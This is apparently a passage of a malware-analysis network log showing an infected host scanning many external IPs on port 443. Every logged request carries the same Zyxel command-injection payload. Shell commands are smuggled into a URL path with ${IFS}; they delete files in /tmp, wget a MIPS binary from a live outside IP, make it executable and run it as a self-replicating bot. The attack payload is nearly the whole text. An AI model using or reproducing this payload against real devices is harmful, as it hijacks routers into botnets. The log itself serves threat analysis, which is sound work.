                                                Jan 28, 2024 10:16:40.035933971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8244192.168.2.2334012143.82.37.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035953999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8245192.168.2.2358352169.189.73.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035991907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8246192.168.2.2340342176.127.93.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036020994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8247192.168.2.235025867.15.181.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036020994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8248192.168.2.2348108119.100.165.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036048889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8249192.168.2.2341004210.205.253.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036088943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8250192.168.2.235935073.188.182.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036088943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8251192.168.2.233741082.123.184.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036135912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8252192.168.2.2355336172.208.68.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036154985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8253192.168.2.2349796101.117.53.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036183119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8254192.168.2.234458859.243.76.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036226988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8255192.168.2.23535025.110.194.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036231041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8256192.168.2.235363039.15.29.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036288977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8257192.168.2.235219640.95.104.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036315918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8258192.168.2.2345706142.20.151.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036344051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8259192.168.2.2332858129.210.46.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036366940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8260192.168.2.235744832.139.172.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036379099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8261192.168.2.233953859.41.124.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036425114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8262192.168.2.2341488211.250.147.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036451101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8263192.168.2.2339212221.138.194.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036504984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8264192.168.2.2336772172.162.99.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036535025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8265192.168.2.2338670101.115.21.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036540985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8266192.168.2.234291865.96.70.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036592007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8267192.168.2.233422035.40.223.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036602974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8268192.168.2.234087887.66.11.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036628962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8269192.168.2.234842613.171.37.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036674976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8270192.168.2.2336914155.56.62.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036696911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8271192.168.2.2341962178.76.137.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036727905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8272192.168.2.233396453.138.181.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036741972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8273192.168.2.2357406149.77.147.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036776066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8274192.168.2.2340608109.223.145.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036801100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8275192.168.2.2353722217.11.76.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036835909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8276192.168.2.2353280185.152.23.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036861897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8277192.168.2.2344380218.243.16.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036899090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8278192.168.2.233467460.153.5.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036916018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8279192.168.2.2335470111.213.6.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036948919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8280192.168.2.2349568193.228.205.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036967039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8281192.168.2.233882099.64.53.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.036993027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8282192.168.2.2346552187.116.21.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037054062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8283192.168.2.2333548223.96.59.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037079096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8284192.168.2.2344000207.90.246.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037081957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8285192.168.2.233682086.167.221.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037115097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8286192.168.2.2336606201.240.13.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037152052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8287192.168.2.2337200206.184.86.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037168980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8288192.168.2.235015647.249.71.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037213087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8289192.168.2.2350754175.212.77.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037225008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8290192.168.2.234804250.62.60.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037240982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8291192.168.2.233696061.238.215.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037250996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8292192.168.2.2357630159.195.42.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037286997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8293192.168.2.235612652.242.240.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037321091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8294192.168.2.2351656126.206.114.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037333965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8295192.168.2.2345942203.232.183.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037381887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8296192.168.2.234919453.246.22.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037400961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8297192.168.2.2351276129.250.133.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037417889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8298192.168.2.2347676168.133.189.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037434101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8299192.168.2.234297249.33.219.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037472010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8300192.168.2.2351842122.111.128.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037503004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8301192.168.2.2352666137.30.193.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037532091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8302192.168.2.235633489.178.175.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037539959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8303192.168.2.2337934211.136.192.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037573099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8304192.168.2.234788485.255.252.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037600994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8305192.168.2.2342990101.208.34.34443
                                                TimestampBytes transferredDirectionData
